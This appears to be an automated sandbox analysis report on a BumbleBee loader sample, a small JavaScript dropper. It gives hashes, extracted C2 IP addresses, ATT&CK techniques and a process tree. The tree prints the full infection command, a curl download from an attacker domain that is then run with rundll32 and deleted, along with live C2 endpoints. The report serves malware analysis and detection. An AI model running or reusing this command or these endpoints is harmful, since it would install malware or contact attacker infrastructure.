bumblebee | 6cd1385131c6f1a0d3e8ec158155a666c1d77319a20c04ca1afa876da5da5d4e

Analysis

max time kernel
144s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
20-04-2023 19:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lIMew1Q9.js
Size

304B
MD5

4d15f28ab76398b3b9db892f23aed6e5
SHA1

43011ca0c15f268e4b720a47241a8c8f6e4bd057
SHA256

6cd1385131c6f1a0d3e8ec158155a666c1d77319a20c04ca1afa876da5da5d4e
SHA512

1af2ab5ae3a6d820d2e523c34bc34ff4a69c0ffc21612cabe08e6bb2b269f4439e073e1bec441817d2280875ce1f7276f2e6eb8f1f17c2d10b40002b4fe65205

Score

10^/10

bumblebee mc1904 trojan

Malware Config

Extracted

Family

bumblebee

Botnet

mc1904

146.70.155.82:443

149.3.170.179:443

103.175.16.150:443

rc4.plain

Signatures

BumbleBee
BumbleBee is a webshell malware written in C++.
trojan bumblebee

Blocklisted process makes network request 7 IoCs

flow	pid	Process
14	3132	rundll32.exe
23	3132	rundll32.exe
37	3132	rundll32.exe
43	3132	rundll32.exe
45	3132	rundll32.exe
48	3132	rundll32.exe
50	3132	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	wscript.exe

Loads dropped DLL 1 IoCs

pid	Process
3132	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3132	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3196 wrote to memory of 4420	3196	wscript.exe	84
PID 3196 wrote to memory of 4420	3196	wscript.exe	84
PID 4420 wrote to memory of 2736	4420	cmd.exe	86
PID 4420 wrote to memory of 2736	4420	cmd.exe	86
PID 4420 wrote to memory of 3132	4420	cmd.exe	87
PID 4420 wrote to memory of 3132	4420	cmd.exe	87

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\lIMew1Q9.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/35EgZAl0ndLtSyB2PtEHMDZXsGF5DVRqOA~~/YgYONy1gmOyI6qASimiMJAPaZfRGBQVArw~~/ --output cjaelvdb.yaq && if exist cjaelvdb.yaq rundll32 cjaelvdb.yaq,bYXjdERymsFY && del cjaelvdb.yaq
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Windows\system32\curl.exe
    curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/35EgZAl0ndLtSyB2PtEHMDZXsGF5DVRqOA~~/YgYONy1gmOyI6qASimiMJAPaZfRGBQVArw~~/ --output cjaelvdb.yaq
    3⤵
    PID:2736
- - C:\Windows\system32\rundll32.exe
    rundll32 cjaelvdb.yaq,bYXjdERymsFY
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    PID:3132

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\cjaelvdb.yaq

Filesize
1.4MB

MD5
2f7cc32eab5132846f2c60cd49b11503

SHA1
a3bd016dd1d2f26857594d4d60f36bc73e9ede99

SHA256
187754f20558b7d67abb233e84ee14a85ea1791983d87d5a4dfe062799ae3d3c

SHA512
2ad2ca1341a5603c76ee0137d88b7134aec944333c41b0aca3af3ca3415e65127225c6b1753d11bf0a1d3b570e00fa6ebb95824f09e048d13d45dfae0ef8e433

Download Submit
C:\Users\Admin\AppData\Local\Temp\cjaelvdb.yaq

Filesize
1.4MB

MD5
2f7cc32eab5132846f2c60cd49b11503

SHA1
a3bd016dd1d2f26857594d4d60f36bc73e9ede99

SHA256
187754f20558b7d67abb233e84ee14a85ea1791983d87d5a4dfe062799ae3d3c

SHA512
2ad2ca1341a5603c76ee0137d88b7134aec944333c41b0aca3af3ca3415e65127225c6b1753d11bf0a1d3b570e00fa6ebb95824f09e048d13d45dfae0ef8e433

Download Submit
memory/3132-136-0x00000189C2190000-0x00000189C22F1000-memory.dmp

Filesize
1.4MB

Download
memory/3132-137-0x00000189C1EF0000-0x00000189C1F6A000-memory.dmp

Filesize
488KB

Download
memory/3132-138-0x00000189C2190000-0x00000189C22F1000-memory.dmp

Filesize
1.4MB

Download
memory/3132-139-0x00000189C2190000-0x00000189C22F1000-memory.dmp

Filesize
1.4MB

Download